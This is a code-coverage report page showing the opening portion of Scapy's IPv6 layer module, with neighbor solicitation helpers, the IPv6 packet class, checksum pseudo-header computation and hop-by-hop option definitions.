Coverage for /pythoncovmergedfiles/medio/medio/usr/local/lib/python3.11/site-packages/scapy/layers/inet6.py: 53%

Shortcuts on this page

r m x   toggle line displays

j k   next/prev highlighted chunk

0   (zero) top of page

1   (one) first highlighted chunk

1815 statements  

1# SPDX-License-Identifier: GPL-2.0-only 

2# This file is part of Scapy 

3# See https://scapy.net/ for more information 

4# Copyright (C) Guillaume Valadon <guedou@hongo.wide.ad.jp> 

5# Copyright (C) Arnaud Ebalard <arnaud.ebalard@eads.net> 

6 

7# Cool history about this file: http://natisbad.org/scapy/index.html 

8 

9 

10""" 

11IPv6 (Internet Protocol v6). 

12""" 

13 

14 

15from hashlib import md5 

16import random 

17import socket 

18import struct 

19from time import gmtime, strftime 

20 

21from scapy.arch import get_if_hwaddr 

22from scapy.as_resolvers import AS_resolver_riswhois 

23from scapy.base_classes import Gen, _ScopedIP 

24from scapy.compat import chb, orb, raw, plain_str, bytes_encode 

25from scapy.consts import WINDOWS, OPENBSD 

26from scapy.config import conf 

27from scapy.data import ( 

28 DLT_IPV6, 

29 DLT_RAW, 

30 DLT_RAW_ALT, 

31 ETHER_ANY, 

32 ETH_P_ALL, 

33 ETH_P_IPV6, 

34 MTU, 

35) 

36from scapy.error import log_runtime, warning 

37from scapy.fields import ( 

38 BitEnumField, 

39 BitField, 

40 ByteEnumField, 

41 ByteField, 

42 DestIP6Field, 

43 FieldLenField, 

44 FlagsField, 

45 IntField, 

46 IP6Field, 

47 LongField, 

48 MACField, 

49 MayEnd, 

50 PacketLenField, 

51 PacketListField, 

52 ShortEnumField, 

53 ShortField, 

54 SourceIP6Field, 

55 StrField, 

56 StrFixedLenField, 

57 StrLenField, 

58 X3BytesField, 

59 XBitField, 

60 XByteField, 

61 XIntField, 

62 XShortField, 

63) 

64from scapy.layers.inet import ( 

65 _ICMPExtensionField, 

66 _ICMPExtensionPadField, 

67 _ICMP_extpad_post_dissection, 

68 IP, 

69 IPTools, 

70 TCP, 

71 TCPerror, 

72 TracerouteResult, 

73 UDP, 

74 UDPerror, 

75) 

76from scapy.layers.l2 import ( 

77 CookedLinux, 

78 Ether, 

79 GRE, 

80 Loopback, 

81 SNAP, 

82 SourceMACField, 

83) 

84from scapy.packet import bind_layers, Packet, Raw 

85from scapy.sendrecv import sendp, sniff, sr, srp1 

86from scapy.supersocket import SuperSocket 

87from scapy.utils import checksum, strxor 

88from scapy.pton_ntop import inet_pton, inet_ntop 

89from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \ 

90 in6_isaddrllallnodes, in6_isaddrllallservers, in6_isaddrTeredo, \ 

91 in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo 

92from scapy.volatile import RandInt, RandShort 

93 

94# Typing 

95from typing import ( 

96 Optional, 

97) 

98 

99if not socket.has_ipv6: 

100 raise socket.error("can't use AF_INET6, IPv6 is disabled") 

101if not hasattr(socket, "IPPROTO_IPV6"): 

102 # Workaround for http://bugs.python.org/issue6926 

103 socket.IPPROTO_IPV6 = 41 

104if not hasattr(socket, "IPPROTO_IPIP"): 

105 # Workaround for https://bitbucket.org/secdev/scapy/issue/5119 

106 socket.IPPROTO_IPIP = 4 

107 

108if conf.route6 is None: 

109 # unused import, only to initialize conf.route6 

110 import scapy.route6 # noqa: F401 

111 

112########################## 

113# Neighbor cache stuff # 

114########################## 

115 

116conf.netcache.new_cache("in6_neighbor", 120) 

117 

118 

119@conf.commands.register 

120def neighsol(addr, src, iface, timeout=1, chainCC=0): 

121 """Sends and receive an ICMPv6 Neighbor Solicitation message 

122 

123 This function sends an ICMPv6 Neighbor Solicitation message 

124 to get the MAC address of the neighbor with specified IPv6 address address. 

125 

126 'src' address is used as the source IPv6 address of the message. Message 

127 is sent on 'iface'. The source MAC address is retrieved accordingly. 

128 

129 By default, timeout waiting for an answer is 1 second. 

130 

131 If no answer is gathered, None is returned. Else, the answer is 

132 returned (ethernet frame). 

133 """ 

134 

135 nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr)) 

136 d = inet_ntop(socket.AF_INET6, nsma) 

137 dm = in6_getnsmac(nsma) 

138 sm = get_if_hwaddr(iface) 

139 p = Ether(dst=dm, src=sm) / IPv6(dst=d, src=src, hlim=255) 

140 p /= ICMPv6ND_NS(tgt=addr) 

141 p /= ICMPv6NDOptSrcLLAddr(lladdr=sm) 

142 res = srp1(p, type=ETH_P_IPV6, iface=iface, timeout=timeout, verbose=0, 

143 chainCC=chainCC) 

144 

145 return res 

146 

147 

148@conf.commands.register 

149def getmacbyip6(ip6, chainCC=0): 

150 # type: (str, int) -> Optional[str] 

151 """ 

152 Returns the MAC address of the next hop used to reach a given IPv6 address. 

153 

154 neighborCache.get() method is used on instantiated neighbor cache. 

155 Resolution mechanism is described in associated doc string. 

156 

157 (chainCC parameter value ends up being passed to sending function 

158 used to perform the resolution, if needed) 

159 

160 .. seealso:: :func:`~scapy.layers.l2.getmacbyip` for IPv4. 

161 """ 

162 # Sanitize the IP 

163 if isinstance(ip6, Net6): 

164 ip6 = str(ip6) 

165 

166 # Multicast 

167 if in6_ismaddr(ip6): # mcast @ 

168 mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6)) 

169 return mac 

170 

171 iff, a, nh = conf.route6.route(ip6) 

172 

173 if iff == conf.loopback_name: 

174 return "ff:ff:ff:ff:ff:ff" 

175 

176 if nh != '::': 

177 ip6 = nh # Found next hop 

178 

179 mac = conf.netcache.in6_neighbor.get(ip6) 

180 if mac: 

181 return mac 

182 

183 res = neighsol(ip6, a, iff, chainCC=chainCC) 

184 

185 if res is not None: 

186 if ICMPv6NDOptDstLLAddr in res: 

187 mac = res[ICMPv6NDOptDstLLAddr].lladdr 

188 else: 

189 mac = res.src 

190 conf.netcache.in6_neighbor[ip6] = mac 

191 return mac 

192 

193 return None 

194 

195 

196############################################################################# 

197############################################################################# 

198# IPv6 Class # 

199############################################################################# 

200############################################################################# 

201 

202ipv6nh = {0: "Hop-by-Hop Option Header", 

203 4: "IP", 

204 6: "TCP", 

205 17: "UDP", 

206 41: "IPv6", 

207 43: "Routing Header", 

208 44: "Fragment Header", 

209 47: "GRE", 

210 50: "ESP Header", 

211 51: "AH Header", 

212 58: "ICMPv6", 

213 59: "No Next Header", 

214 60: "Destination Option Header", 

215 112: "VRRP", 

216 132: "SCTP", 

217 135: "Mobility Header"} 

218 

219ipv6nhcls = {0: "IPv6ExtHdrHopByHop", 

220 4: "IP", 

221 6: "TCP", 

222 17: "UDP", 

223 43: "IPv6ExtHdrRouting", 

224 44: "IPv6ExtHdrFragment", 

225 50: "ESP", 

226 51: "AH", 

227 58: "ICMPv6Unknown", 

228 59: "Raw", 

229 60: "IPv6ExtHdrDestOpt"} 

230 

231 

232class IP6ListField(StrField): 

233 __slots__ = ["count_from", "length_from"] 

234 islist = 1 

235 

236 def __init__(self, name, default, count_from=None, length_from=None): 

237 if default is None: 

238 default = [] 

239 StrField.__init__(self, name, default) 

240 self.count_from = count_from 

241 self.length_from = length_from 

242 

243 def i2len(self, pkt, i): 

244 return 16 * len(i) 

245 

246 def i2count(self, pkt, i): 

247 if isinstance(i, list): 

248 return len(i) 

249 return 0 

250 

251 def getfield(self, pkt, s): 

252 c = tmp_len = None 

253 if self.length_from is not None: 

254 tmp_len = self.length_from(pkt) 

255 elif self.count_from is not None: 

256 c = self.count_from(pkt) 

257 

258 lst = [] 

259 ret = b"" 

260 remain = s 

261 if tmp_len is not None: 

262 remain, ret = s[:tmp_len], s[tmp_len:] 

263 while remain: 

264 if c is not None: 

265 if c <= 0: 

266 break 

267 c -= 1 

268 addr = inet_ntop(socket.AF_INET6, remain[:16]) 

269 lst.append(addr) 

270 remain = remain[16:] 

271 return remain + ret, lst 

272 

273 def i2m(self, pkt, x): 

274 s = b"" 

275 for y in x: 

276 try: 

277 y = inet_pton(socket.AF_INET6, y) 

278 except Exception: 

279 y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0] 

280 y = inet_pton(socket.AF_INET6, y) 

281 s += y 

282 return s 

283 

284 def i2repr(self, pkt, x): 

285 s = [] 

286 if x is None: 

287 return "[]" 

288 for y in x: 

289 s.append('%s' % y) 

290 return "[ %s ]" % (", ".join(s)) 

291 

292 

293class _IPv6GuessPayload: 

294 name = "Dummy class that implements guess_payload_class() for IPv6" 

295 

296 def default_payload_class(self, p): 

297 if self.nh == 58: # ICMPv6 

298 t = orb(p[0]) 

299 if len(p) > 2 and (t == 139 or t == 140): # Node Info Query 

300 return _niquery_guesser(p) 

301 if len(p) >= icmp6typesminhdrlen.get(t, float("inf")): # Other ICMPv6 messages # noqa: E501 

302 if t == 130 and len(p) >= 28: 

303 # RFC 3810 - 8.1. Query Version Distinctions 

304 return ICMPv6MLQuery2 

305 return icmp6typescls.get(t, Raw) 

306 return Raw 

307 elif self.nh == 135 and len(p) > 3: # Mobile IPv6 

308 return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic) 

309 elif self.nh == 43 and orb(p[2]) == 4: # Segment Routing header 

310 return IPv6ExtHdrSegmentRouting 

311 return ipv6nhcls.get(self.nh, Raw) 

312 

313 

314class IPv6(_IPv6GuessPayload, Packet, IPTools): 

315 name = "IPv6" 

316 fields_desc = [BitField("version", 6, 4), 

317 BitField("tc", 0, 8), 

318 BitField("fl", 0, 20), 

319 ShortField("plen", None), 

320 ByteEnumField("nh", 59, ipv6nh), 

321 ByteField("hlim", 64), 

322 SourceIP6Field("src"), 

323 DestIP6Field("dst", "::1")] 

324 

325 def route(self): 

326 """Used to select the L2 address""" 

327 dst = self.dst 

328 scope = None 

329 if isinstance(dst, (Net6, _ScopedIP)): 

330 scope = dst.scope 

331 if isinstance(dst, (Gen, list)): 

332 dst = next(iter(dst)) 

333 return conf.route6.route(dst, dev=scope) 

334 

335 def mysummary(self): 

336 return "%s > %s (%i)" % (self.src, self.dst, self.nh) 

337 

338 def post_build(self, p, pay): 

339 p += pay 

340 if self.plen is None: 

341 tmp_len = len(p) - 40 

342 p = p[:4] + struct.pack("!H", tmp_len) + p[6:] 

343 return p 

344 

345 def extract_padding(self, data): 

346 """Extract the IPv6 payload""" 

347 

348 if self.plen == 0 and self.nh == 0 and len(data) >= 8: 

349 # Extract Hop-by-Hop extension length 

350 hbh_len = orb(data[1]) 

351 hbh_len = 8 + hbh_len * 8 

352 

353 # Extract length from the Jumbogram option 

354 # Note: the following algorithm take advantage of the Jumbo option 

355 # mandatory alignment (4n + 2, RFC2675 Section 2) 

356 jumbo_len = None 

357 idx = 0 

358 offset = 4 * idx + 2 

359 while offset <= len(data): 

360 opt_type = orb(data[offset]) 

361 if opt_type == 0xc2: # Jumbo option 

362 jumbo_len = struct.unpack("I", data[offset + 2:offset + 2 + 4])[0] # noqa: E501 

363 break 

364 offset = 4 * idx + 2 

365 idx += 1 

366 

367 if jumbo_len is None: 

368 log_runtime.info("Scapy did not find a Jumbo option") 

369 jumbo_len = 0 

370 

371 tmp_len = hbh_len + jumbo_len 

372 else: 

373 tmp_len = self.plen 

374 

375 return data[:tmp_len], data[tmp_len:] 

376 

377 def hashret(self): 

378 if self.nh == 58 and isinstance(self.payload, _ICMPv6): 

379 if self.payload.type < 128: 

380 return self.payload.payload.hashret() 

381 elif (self.payload.type in [133, 134, 135, 136, 144, 145]): 

382 return struct.pack("B", self.nh) + self.payload.hashret() 

383 

384 if not conf.checkIPinIP and self.nh in [4, 41]: # IP, IPv6 

385 return self.payload.hashret() 

386 

387 nh = self.nh 

388 sd = self.dst 

389 ss = self.src 

390 if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting): 

391 # With routing header, the destination is the last 

392 # address of the IPv6 list if segleft > 0 

393 nh = self.payload.nh 

394 try: 

395 sd = self.addresses[-1] 

396 except IndexError: 

397 sd = '::1' 

398 # TODO: big bug with ICMPv6 error messages as the destination of IPerror6 # noqa: E501 

399 # could be anything from the original list ... 

400 if 1: 

401 sd = inet_pton(socket.AF_INET6, sd) 

402 for a in self.addresses: 

403 a = inet_pton(socket.AF_INET6, a) 

404 sd = strxor(sd, a) 

405 sd = inet_ntop(socket.AF_INET6, sd) 

406 

407 if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting): # noqa: E501 

408 # With segment routing header (rh == 4), the destination is 

409 # the first address of the IPv6 addresses list 

410 try: 

411 sd = self.addresses[0] 

412 except IndexError: 

413 sd = self.dst 

414 

415 if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment): 

416 nh = self.payload.nh 

417 

418 if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop): 

419 nh = self.payload.nh 

420 

421 if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): 

422 foundhao = None 

423 for o in self.payload.options: 

424 if isinstance(o, HAO): 

425 foundhao = o 

426 if foundhao: 

427 ss = foundhao.hoa 

428 nh = self.payload.nh # XXX what if another extension follows ? 

429 

430 if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd): 

431 sd = inet_pton(socket.AF_INET6, sd) 

432 ss = inet_pton(socket.AF_INET6, ss) 

433 return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret() # noqa: E501 

434 else: 

435 return struct.pack("B", nh) + self.payload.hashret() 

436 

437 def answers(self, other): 

438 if not conf.checkIPinIP: # skip IP in IP and IPv6 in IP 

439 if self.nh in [4, 41]: 

440 return self.payload.answers(other) 

441 if isinstance(other, IPv6) and other.nh in [4, 41]: 

442 return self.answers(other.payload) 

443 if isinstance(other, IP) and other.proto in [4, 41]: 

444 return self.answers(other.payload) 

445 if not isinstance(other, IPv6): # self is reply, other is request 

446 return False 

447 if conf.checkIPaddr: 

448 # ss = inet_pton(socket.AF_INET6, self.src) 

449 sd = inet_pton(socket.AF_INET6, self.dst) 

450 os = inet_pton(socket.AF_INET6, other.src) 

451 od = inet_pton(socket.AF_INET6, other.dst) 

452 # request was sent to a multicast address (other.dst) 

453 # Check reply destination addr matches request source addr (i.e 

454 # sd == os) except when reply is multicasted too 

455 # XXX test mcast scope matching ? 

456 if in6_ismaddr(other.dst): 

457 if in6_ismaddr(self.dst): 

458 if ((od == sd) or 

459 (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))): # noqa: E501 

460 return self.payload.answers(other.payload) 

461 return False 

462 if (os == sd): 

463 return self.payload.answers(other.payload) 

464 return False 

465 elif (sd != os): # or ss != od): <- removed for ICMP errors 

466 return False 

467 if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128: # noqa: E501 

468 # ICMPv6 Error message -> generated by IPv6 packet 

469 # Note : at the moment, we jump the ICMPv6 specific class 

470 # to call answers() method of erroneous packet (over 

471 # initial packet). There can be cases where an ICMPv6 error 

472 # class could implement a specific answers method that perform 

473 # a specific task. Currently, don't see any use ... 

474 return self.payload.payload.answers(other) 

475 elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop): 

476 return self.payload.answers(other.payload) 

477 elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment): 

478 return self.payload.answers(other.payload.payload) 

479 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting): 

480 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501 

481 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting): # noqa: E501 

482 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501 

483 elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt): 

484 return self.payload.answers(other.payload.payload) 

485 elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance # noqa: E501 

486 return self.payload.payload.answers(other.payload) 

487 else: 

488 if (self.nh != other.nh): 

489 return False 

490 return self.payload.answers(other.payload) 

491 

492 

493class IPv46(IP, IPv6): 

494 """ 

495 This class implements a dispatcher that is used to detect the IP version 

496 while parsing Raw IP pcap files. 

497 """ 

498 name = "IPv4/6" 

499 

500 @classmethod 

501 def dispatch_hook(cls, _pkt=None, *_, **kargs): 

502 if _pkt: 

503 if orb(_pkt[0]) >> 4 == 6: 

504 return IPv6 

505 elif kargs.get("version") == 6: 

506 return IPv6 

507 return IP 

508 

509 

510def inet6_register_l3(l2, l3): 

511 """ 

512 Resolves the default L2 destination address when IPv6 is used. 

513 """ 

514 return getmacbyip6(l3.dst) 

515 

516 

517conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3) 

518 

519 

520class IPerror6(IPv6): 

521 name = "IPv6 in ICMPv6" 

522 

523 def answers(self, other): 

524 if not isinstance(other, IPv6): 

525 return False 

526 sd = inet_pton(socket.AF_INET6, self.dst) 

527 ss = inet_pton(socket.AF_INET6, self.src) 

528 od = inet_pton(socket.AF_INET6, other.dst) 

529 os = inet_pton(socket.AF_INET6, other.src) 

530 

531 # Make sure that the ICMPv6 error is related to the packet scapy sent 

532 if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128: 

533 

534 # find upper layer for self (possible citation) 

535 selfup = self.payload 

536 while selfup is not None and isinstance(selfup, _IPv6ExtHdr): 

537 selfup = selfup.payload 

538 

539 # find upper layer for other (initial packet). Also look for RH 

540 otherup = other.payload 

541 request_has_rh = False 

542 while otherup is not None and isinstance(otherup, _IPv6ExtHdr): 

543 if isinstance(otherup, IPv6ExtHdrRouting): 

544 request_has_rh = True 

545 otherup = otherup.payload 

546 

547 if ((ss == os and sd == od) or # < Basic case 

548 (ss == os and request_has_rh)): 

549 # ^ Request has a RH : don't check dst address 

550 

551 # Let's deal with possible MSS Clamping 

552 if (isinstance(selfup, TCP) and 

553 isinstance(otherup, TCP) and 

554 selfup.options != otherup.options): # seems clamped 

555 

556 # Save fields modified by MSS clamping 

557 old_otherup_opts = otherup.options 

558 old_otherup_cksum = otherup.chksum 

559 old_otherup_dataofs = otherup.dataofs 

560 old_selfup_opts = selfup.options 

561 old_selfup_cksum = selfup.chksum 

562 old_selfup_dataofs = selfup.dataofs 

563 

564 # Nullify them 

565 otherup.options = [] 

566 otherup.chksum = 0 

567 otherup.dataofs = 0 

568 selfup.options = [] 

569 selfup.chksum = 0 

570 selfup.dataofs = 0 

571 

572 # Test it and save result 

573 s1 = raw(selfup) 

574 s2 = raw(otherup) 

575 tmp_len = min(len(s1), len(s2)) 

576 res = s1[:tmp_len] == s2[:tmp_len] 

577 

578 # recall saved values 

579 otherup.options = old_otherup_opts 

580 otherup.chksum = old_otherup_cksum 

581 otherup.dataofs = old_otherup_dataofs 

582 selfup.options = old_selfup_opts 

583 selfup.chksum = old_selfup_cksum 

584 selfup.dataofs = old_selfup_dataofs 

585 

586 return res 

587 

588 s1 = raw(selfup) 

589 s2 = raw(otherup) 

590 tmp_len = min(len(s1), len(s2)) 

591 return s1[:tmp_len] == s2[:tmp_len] 

592 

593 return False 

594 

595 def mysummary(self): 

596 return Packet.mysummary(self) 

597 

598 

599############################################################################# 

600############################################################################# 

601# Upper Layer Checksum computation # 

602############################################################################# 

603############################################################################# 

604 

605class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation 

606 name = "Pseudo IPv6 Header" 

607 fields_desc = [IP6Field("src", "::"), 

608 IP6Field("dst", "::"), 

609 IntField("uplen", None), 

610 BitField("zero", 0, 24), 

611 ByteField("nh", 0)] 

612 

613 

614def in6_pseudoheader(nh, u, plen): 

615 # type: (int, IP, int) -> PseudoIPv6 

616 """ 

617 Build an PseudoIPv6 instance as specified in RFC 2460 8.1 

618 

619 This function operates by filling a pseudo header class instance 

620 (PseudoIPv6) with: 

621 - Next Header value 

622 - the address of _final_ destination (if some Routing Header with non 

623 segleft field is present in underlayer classes, last address is used.) 

624 - the address of _real_ source (basically the source address of an 

625 IPv6 class instance available in the underlayer or the source address 

626 in HAO option if some Destination Option header found in underlayer 

627 includes this option). 

628 - the length is the length of provided payload string ('p') 

629 

630 :param nh: value of upper layer protocol 

631 :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be 

632 provided with all under layers (IPv6 and all extension headers, 

633 for example) 

634 :param plen: the length of the upper layer and payload 

635 """ 

636 ph6 = PseudoIPv6() 

637 ph6.nh = nh 

638 rthdr = 0 

639 hahdr = 0 

640 final_dest_addr_found = 0 

641 while u is not None and not isinstance(u, IPv6): 

642 if (isinstance(u, IPv6ExtHdrRouting) and 

643 u.segleft != 0 and len(u.addresses) != 0 and 

644 final_dest_addr_found == 0): 

645 rthdr = u.addresses[-1] 

646 final_dest_addr_found = 1 

647 elif (isinstance(u, IPv6ExtHdrSegmentRouting) and 

648 u.segleft != 0 and len(u.addresses) != 0 and 

649 final_dest_addr_found == 0): 

650 rthdr = u.addresses[0] 

651 final_dest_addr_found = 1 

652 elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and 

653 isinstance(u.options[0], HAO)): 

654 hahdr = u.options[0].hoa 

655 u = u.underlayer 

656 if u is None: 

657 warning("No IPv6 underlayer to compute checksum. Leaving null.") 

658 return None 

659 if hahdr: 

660 ph6.src = hahdr 

661 else: 

662 ph6.src = u.src 

663 if rthdr: 

664 ph6.dst = rthdr 

665 else: 

666 ph6.dst = u.dst 

667 ph6.uplen = plen 

668 return ph6 

669 

670 

671def in6_chksum(nh, u, p): 

672 """ 

673 As Specified in RFC 2460 - 8.1 Upper-Layer Checksums 

674 

675 See also `.in6_pseudoheader` 

676 

677 :param nh: value of upper layer protocol 

678 :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be 

679 provided with all under layers (IPv6 and all extension headers, 

680 for example) 

681 :param p: the payload of the upper layer provided as a string 

682 """ 

683 ph6 = in6_pseudoheader(nh, u, len(p)) 

684 if ph6 is None: 

685 return 0 

686 ph6s = raw(ph6) 

687 return checksum(ph6s + p) 

688 

689 

690############################################################################# 

691############################################################################# 

692# Extension Headers # 

693############################################################################# 

694############################################################################# 

695 

696nh_clserror = {socket.IPPROTO_TCP: TCPerror, 

697 socket.IPPROTO_UDP: UDPerror} 

698 

699 

700# Inherited by all extension header classes 

701class _IPv6ExtHdr(_IPv6GuessPayload, Packet): 

702 name = 'Abstract IPv6 Option Header' 

703 aliastypes = [IPv6] 

704 

705 def guess_payload_class(self, payload): 

706 if self.nh in nh_clserror: 

707 underlayer = self.underlayer 

708 while underlayer: 

709 if isinstance(underlayer, IPerror6): 

710 return nh_clserror[self.nh] 

711 underlayer = underlayer.underlayer 

712 return super(_IPv6ExtHdr, self).guess_payload_class(payload) 

713 

714 

715# IPv6 options for Extension Headers # 

716 

717_hbhopts = {0x00: "Pad1", 

718 0x01: "PadN", 

719 0x04: "Tunnel Encapsulation Limit", 

720 0x05: "Router Alert", 

721 0x06: "Quick-Start", 

722 0xc2: "Jumbo Payload", 

723 0xc9: "Home Address Option"} 

724 

725 

726class _OTypeField(ByteEnumField): 

727 """ 

728 Modified BytEnumField that displays information regarding the IPv6 option 

729 based on its option type value (What should be done by nodes that process 

730 the option if they do not understand it ...) 

731 

732 It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options 

733 """ 

734 pol = {0x00: "00: skip", 

735 0x40: "01: discard", 

736 0x80: "10: discard+ICMP", 

737 0xC0: "11: discard+ICMP not mcast"} 

738 

739 enroutechange = {0x00: "0: Don't change en-route", 

740 0x20: "1: May change en-route"} 

741 

742 def i2repr(self, pkt, x): 

743 s = self.i2s.get(x, repr(x)) 

744 polstr = self.pol[(x & 0xC0)] 

745 enroutechangestr = self.enroutechange[(x & 0x20)] 

746 return "%s [%s, %s]" % (s, polstr, enroutechangestr) 

747 

748 

749class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option 

750 name = "Scapy6 Unknown Option" 

751 fields_desc = [_OTypeField("otype", 0x01, _hbhopts), 

752 FieldLenField("optlen", None, length_of="optdata", fmt="B"), 

753 StrLenField("optdata", "", 

754 length_from=lambda pkt: pkt.optlen)] 

755 

756 def alignment_delta(self, curpos): # By default, no alignment requirement 

757 """ 

758 As specified in section 4.2 of RFC 2460, every options has 

759 an alignment requirement usually expressed xn+y, meaning 

760 the Option Type must appear at an integer multiple of x octets 

761 from the start of the header, plus y octets. 

762 

763 That function is provided the current position from the 

764 start of the header and returns required padding length. 

765 """ 

766 return 0 

767 

768 @classmethod 

769 def dispatch_hook(cls, _pkt=None, *args, **kargs): 

770 if _pkt: 

771 o = orb(_pkt[0]) # Option type 

772 if o in _hbhoptcls: 

773 return _hbhoptcls[o] 

774 return cls 

775 

776 def extract_padding(self, p): 

777 return b"", p 

778 

779 

780class Pad1(Packet): # IPv6 Hop-By-Hop Option 

781 name = "Pad1" 

782 fields_desc = [_OTypeField("otype", 0x00, _hbhopts)] 

783 

784 def alignment_delta(self, curpos): # No alignment requirement 

785 return 0 

786 

787 def extract_padding(self, p): 

788 return b"", p 

789 

790 

791class PadN(Packet): # IPv6 Hop-By-Hop Option 

792 name = "PadN" 

793 fields_desc = [_OTypeField("otype", 0x01, _hbhopts), 

794 FieldLenField("optlen", None, length_of="optdata", fmt="B"), 

795 StrLenField("optdata", "", 

796 length_from=lambda pkt: pkt.optlen)] 

797 

798 def alignment_delta(self, curpos): # No alignment requirement 

799 return 0 

800 

801 def extract_padding(self, p): 

802 return b"", p 

803 

804 

805class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option 

806 name = "Router Alert" 

807 fields_desc = [_OTypeField("otype", 0x05, _hbhopts), 

808 ByteField("optlen", 2), 

809 ShortEnumField("value", None, 

810 {0: "Datagram contains a MLD message", 

811 1: "Datagram contains RSVP message", 

812 2: "Datagram contains an Active Network message", # noqa: E501 

813 68: "NSIS NATFW NSLP", 

814 69: "MPLS OAM", 

815 65535: "Reserved"})] 

816 # TODO : Check IANA has not defined new values for value field of RouterAlertOption # noqa: E501 

817 # TODO : Now that we have that option, we should do something in MLD class that need it # noqa: E501 

818 # TODO : IANA has defined ranges of values which can't be easily represented here. # noqa: E501 

819 # iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml 

820 

821 def alignment_delta(self, curpos): # alignment requirement : 2n+0 

822 x = 2 

823 y = 0 

824 delta = x * ((curpos - y + x - 1) // x) + y - curpos 

825 return delta 

826 

827 def extract_padding(self, p): 

828 return b"", p 

829 

830 

831class RplOption(Packet): # RFC 6553 - RPL Option 

832 name = "RPL Option" 

833 fields_desc = [_OTypeField("otype", 0x63, _hbhopts), 

834 ByteField("optlen", 4), 

835 BitField("Down", 0, 1), 

836 BitField("RankError", 0, 1), 

837 BitField("ForwardError", 0, 1), 

838 BitField("unused", 0, 5), 

839 XByteField("RplInstanceId", 0), 

840 XShortField("SenderRank", 0)] 

841 

842 def alignment_delta(self, curpos): # alignment requirement : 2n+0 

843 x = 2 

844 y = 0 

845 delta = x * ((curpos - y + x - 1) // x) + y - curpos 

846 return delta 

847 

848 def extract_padding(self, p): 

849 return b"", p 

850 

851 

852class Jumbo(Packet): # IPv6 Hop-By-Hop Option 

853 name = "Jumbo Payload" 

854 fields_desc = [_OTypeField("otype", 0xC2, _hbhopts), 

855 ByteField("optlen", 4), 

856 IntField("jumboplen", None)] 

857 

858 def alignment_delta(self, curpos): # alignment requirement : 4n+2 

859 x = 4 

860 y = 2 

861 delta = x * ((curpos - y + x - 1) // x) + y - curpos 

862 return delta 

863 

864 def extract_padding(self, p): 

865 return b"", p 

866 

867 

868class HAO(Packet): # IPv6 Destination Options Header Option 

869 name = "Home Address Option" 

870 fields_desc = [_OTypeField("otype", 0xC9, _hbhopts), 

871 ByteField("optlen", 16), 

872 IP6Field("hoa", "::")] 

873 

874 def alignment_delta(self, curpos): # alignment requirement : 8n+6 

875 x = 8 

876 y = 6 

877 delta = x * ((curpos - y + x - 1) // x) + y - curpos 

878 return delta 

879 

880 def extract_padding(self, p): 

881 return b"", p 

882 

883 

884_hbhoptcls = {0x00: Pad1, 

885 0x01: PadN, 

886 0x05: RouterAlert, 

887 0x63: RplOption, 

888 0xC2: Jumbo, 

889 0xC9: HAO} 

890 

891 

892# Hop-by-Hop Extension Header # 

893 

894class _OptionsField(PacketListField): 

895 __slots__ = ["curpos"] 

896 

897 def __init__(self, name, default, cls, curpos, *args, **kargs): 

898 self.curpos = curpos 

899 PacketListField.__init__(self, name, default, cls, *args, **kargs) 

900 

901 def i2len(self, pkt, i): 

902 return len(self.i2m(pkt, i)) 

903 

904 def i2m(self, pkt, x): 

905 autopad = None 

906 try: 

907 autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field 

908 except Exception: 

909 autopad = 1 

910 

911 if not autopad: 

912 return b"".join(map(bytes, x)) 

913 

914 curpos = self.curpos 

915 s = b"" 

916 for p in x: 

917 d = p.alignment_delta(curpos) 

918 curpos += d 

919 if d == 1: 

920 s += raw(Pad1()) 

921 elif d != 0: 

922 s += raw(PadN(optdata=b'\x00' * (d - 2))) 

923 pstr = raw(p) 

924 curpos += len(pstr) 

925 s += pstr 

926 

927 # Let's make the class including our option field 

928 # a multiple of 8 octets long 

929 d = curpos % 8 

930 if d == 0: 

931 return s 

932 d = 8 - d 

933 if d == 1: 

934 s += raw(Pad1()) 

935 elif d != 0: 

936 s += raw(PadN(optdata=b'\x00' * (d - 2))) 

937 

938 return s 

939 

940 def addfield(self, pkt, s, val): 

941 return s + self.i2m(pkt, val) 

942 

943 

944class _PhantomAutoPadField(ByteField): 

945 def addfield(self, pkt, s, val): 

946 return s 

947 

948 def getfield(self, pkt, s): 

949 return s, 1 

950 

951 def i2repr(self, pkt, x): 

952 if x: 

953 return "On" 

954 return "Off" 

955 

956 

957class IPv6ExtHdrHopByHop(_IPv6ExtHdr): 

958 name = "IPv6 Extension Header - Hop-by-Hop Options Header" 

